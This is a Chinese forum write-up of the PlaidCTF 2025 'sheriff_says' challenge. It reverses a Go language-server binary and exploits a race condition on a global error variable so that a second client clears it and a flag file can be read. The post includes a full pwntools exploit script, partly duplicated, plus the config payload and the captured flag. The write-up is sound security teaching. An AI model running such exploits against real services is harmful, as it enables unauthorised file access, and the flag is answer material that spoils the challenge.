首页
社区
课程
招聘
[原创]plaidctf 2025 sheriff_says wp
发表于: 2025-4-16 22:05 5192

[原创]plaidctf 2025 sheriff_says wp

2025-4-16 22:05
5192

我不语,只是一遍又一遍重复河豚鱼的教诲。

借此题,总结一下go逆向的技巧。

使用neovim与go语言实现的lsp(language server protocol)服务端交互,核心在于lsp server(go 实现)的逆向

lsp协议的的处理逻辑在这

下面的runtime_newobject就没有恢复返回值导致下面的v367飘红

由于go的函数调用的寄存器使用顺序 RAX、RBX、RCX、RDI、RSI、R8、R9、R10、R11

RDX用作闭包上下文的指针

go语言的函数开头都会插入栈检查代码,可以根据这个特征识别真正的参数,如这里就是rax一个参数

ida没有识别到返回值,而且go是支持多返回值的,有个大力出奇迹的方法,那就是把返回值修改为_OWORD, 返回两个返回值的函数是比较多的。

而且,据我观察函数中没有用的到倒数的参数,一般就是返回值,如这里的runtime_newobject()中的void *r0就是返回值。

修复后:好看很多(只修改函数签名还不够,还要在被调用出修改call type)

程序匹配method的长度,使用switch case匹配,关键点在workspace/executeCommand

其支持两个command:

通过逆向wildwest.loadNewConfig负责更新配置文件,如果配置文件设置了usefilesyetem为true,则会进入打开flag的逻辑。

其参数可以在其local type中看出来,

知道config需要这四个参数,但是还要确定其传参的格式,在main_loadNewConfigReflectively中

调用reflect_value_elem,reflect_value_fieldByName来反射

最后查看Argument的类型是个slice知道穿的是数组

最后确定了格式:

对于wildwest.quickDraw,传的也是三个参数,程序会检查三个参数的类型,依次是string,float,string,分别对应文件名,文件行,第三个string没有用到。

如果quickDraw传入的文件名包括’flag’,则传入main.err

在后面会检查main.err 如果有 则退出 代码运行不到 readFileConrtent

但是观察到这里面有个大循环,故意拖时间,可以main.err是个全局变量,所以这里有个条件竞争。

在initialize中,会将main.err置空,所以需要另外启动一个客户端去竞争,把main.err置空

在quickDraw中,会检查修复的修复的次数,必须修复过warning才可以

所以在didopen的时候传入会warning的文本

然后再didchange传入修复好的文本就可以了

[{
    "EnforcePrefix": False,
    "RequiredPrefix": "sheriff_says_",
    "MinimumNameLength": 1,
    "UseFileSystem": True
}]
[{
    "EnforcePrefix": False,
    "RequiredPrefix": "sheriff_says_",
    "MinimumNameLength": 1,
    "UseFileSystem": True
}]
from pwn import *
import time
 
import json
import socket
from typing import Dict, Any
 
class SimpleLSClient:
    def __init__(self, host: str = 'localhost', port: int = 9999):
        """初始化 LSP 客户端"""
        self.host = host
        self.port = port
        self.socket = None
        self.request_id = 0
        context.log_level = 'debug'
 
    def connect(self):
        """建立 socket 连接"""
        try:
            self.socket = remote(self.host, self.port)
             
        except Exception as e:
            print(f"连接失败: {e}")
 
    def disconnect(self):
        """关闭连接"""
        if self.socket:
            self.socket.close()
            print("连接已关闭")
 
    def build_request(self, method: str, params: Dict[str, Any] = None) -> str:
        """构建 LSP 请求"""
        self.request_id += 1
        request = {
            "jsonrpc": "2.0",
            "id": self.request_id,
            "method": method,
            "params": params or {}
        }
         
        # 转换为 JSON 并添加 Content-Length 头
        content = json.dumps(request)
        header = f"Content-Length: {len(content)}\r\n\r\n"
        return header + content
 
    def send_request(self, method: str, params: Dict[str, Any] = None) -> Dict[str, Any]:
        """发送请求并接收响应"""
        if not self.socket:
            raise ConnectionError("未连接到服务器")
 
        # 构建并发送请求
        request = self.build_request(method, params)
        self.socket.send(request.encode('utf-8'))
 
        # 接收响应
        response = self.receive_response()
        return response
 
    def receive_response(self) -> Dict[str, Any]:
        """接收并解析服务器响应"""
        # 首先读取 header
        header = ""
        while '\r\n\r\n' not in header:
            header += self.socket.recv(1).decode('utf-8')
 
        # 解析 Content-Length
        content_length = int(header.split('Content-Length: ')[1].split('\r\n')[0])
 
        # 读取响应内容
        content = b""
        while len(content) < content_length:
            content += self.socket.recv(content_length - len(content))
 
        return json.loads(content.decode())
 
def make_initialize_request(client):
    init_params = {
        "processId": None,
        "rootUri": "file:///mnt/e/CTF/plaidctf2025/sheriff_says",
        "capabilities": {
            "textDocument": {
                "Completion": {
                    "CompletionItem": {
                        "sSnippetSupport": True
                    }
                }
            }
        },
        "clientinfo":{
            "name": "neovim",
            'version': "1"
        }
    }
 
    response = client.send_request("initialize", init_params)
    print("Initialize 响应:", json.dumps(response, indent=2))
    # client.send_request("initialized", {})
 
def make_did_open_request(client,code):
    did_open_params = {
            "textDocument": {
                "uri": "file:///mnt/e/CTF/plaidctf2025/sheriff_says/test.go",
                "text": code
            }
        }
    response = client.send_request("textDocument/didOpen", did_open_params)
    print("DidOpen 响应:", json.dumps(response, indent=2))
 
def make_did_change_request(client,code):
    did_change_params = {
            "textDocument": {
                "uri": "file:///mnt/e/CTF/plaidctf2025/sheriff_says/test.go",
            },
            "contentChanges": [
                {
                    "text": code
                }
            ]
        }
    response = client.send_request("textDocument/didChange", did_change_params)
    print("DidChange 响应:", json.dumps(response, indent=2))
 
def make_execute_command_request(client,command,args):
    print(command)
    execute_command_params = {
        "command": command,
        "arguments": args
    }
 
    response = client.send_request("workspace/executeCommand", execute_command_params)
    print("ExecuteCommand 响应:", json.dumps(response, indent=2))
 
go_code = '''// test.go
package main
 
import "fmt"
 
func test1() {
    wr_bronco_sheriff := 1
    return wr_bronco_sheriff
    // this is a comment
}
'''
 
go_rename_code = '''// test.go
package main
 
import "fmt"
 
func sheriff_says_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa() {
    wr_bronco_sheriff := 1
    return wr_bronco_sheriff
    // this is a comment
}
'''
 
def main():
 
    # 创建客户端实例
    client = SimpleLSClient('54.221.151.72',7010)
 
    # 连接到服务器
    client.connect()
 
    client2 = SimpleLSClient('54.221.151.72',7010)
    client2.connect()
     
 
    # try:
    make_initialize_request(client)
    make_did_open_request(client, go_code)
    make_did_change_request(client, go_rename_code)
    make_execute_command_request(client, "wildwest.loadNewConfig", [
        {"EnforcePrefix": False,
        "RequiredPrefix":"sheriff_says_a",
        "MinimumNameLength": 1,
        "UseFileSystem": True},
        0,0
        ])
 
    make_execute_command_request(client, "wildwest.quickDraw",['flag',0.0,''])
    make_initialize_request(client2)
    print(client.socket.recv())
    client.socket.interactive()
    # time.sleep(2)
 
    # except Exception as e:
    #     print(f"错误: {e}")
    # finally:
         
    #     client.disconnect()
 
if __name__ == "__main__":
 
    main()
 
# PCTF{sh3riFF_$4y$_y0uR_c0D3_1$_cL34N_dd323724983c}
from pwn import *
import time
 
import json
import socket
from typing import Dict, Any
 
class SimpleLSClient:
    def __init__(self, host: str = 'localhost', port: int = 9999):
        """初始化 LSP 客户端"""
        self.host = host
        self.port = port
        self.socket = None
        self.request_id = 0
        context.log_level = 'debug'
 
    def connect(self):
        """建立 socket 连接"""
        try:
            self.socket = remote(self.host, self.port)
             
        except Exception as e:
            print(f"连接失败: {e}")
 
    def disconnect(self):
        """关闭连接"""
        if self.socket:
            self.socket.close()
            print("连接已关闭")
 
    def build_request(self, method: str, params: Dict[str, Any] = None) -> str:
        """构建 LSP 请求"""
        self.request_id += 1
        request = {
            "jsonrpc": "2.0",
            "id": self.request_id,
            "method": method,
            "params": params or {}
        }
         
        # 转换为 JSON 并添加 Content-Length 头
        content = json.dumps(request)
        header = f"Content-Length: {len(content)}\r\n\r\n"
        return header + content
 
    def send_request(self, method: str, params: Dict[str, Any] = None) -> Dict[str, Any]:
        """发送请求并接收响应"""
        if not self.socket:
            raise ConnectionError("未连接到服务器")
 
        # 构建并发送请求
        request = self.build_request(method, params)
        self.socket.send(request.encode('utf-8'))
 
        # 接收响应
        response = self.receive_response()
        return response
 
    def receive_response(self) -> Dict[str, Any]:
        """接收并解析服务器响应"""
        # 首先读取 header
        header = ""
        while '\r\n\r\n' not in header:
            header += self.socket.recv(1).decode('utf-8')
 
        # 解析 Content-Length
        content_length = int(header.split('Content-Length: ')[1].split('\r\n')[0])
 
        # 读取响应内容
        content = b""
        while len(content) < content_length:
            content += self.socket.recv(content_length - len(content))
 
        return json.loads(content.decode())
 
def make_initialize_request(client):
    init_params = {
        "processId": None,
        "rootUri": "file:///mnt/e/CTF/plaidctf2025/sheriff_says",

[培训]科锐逆向工程师培训第53期2025年7月8日开班!

收藏
免费 1
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回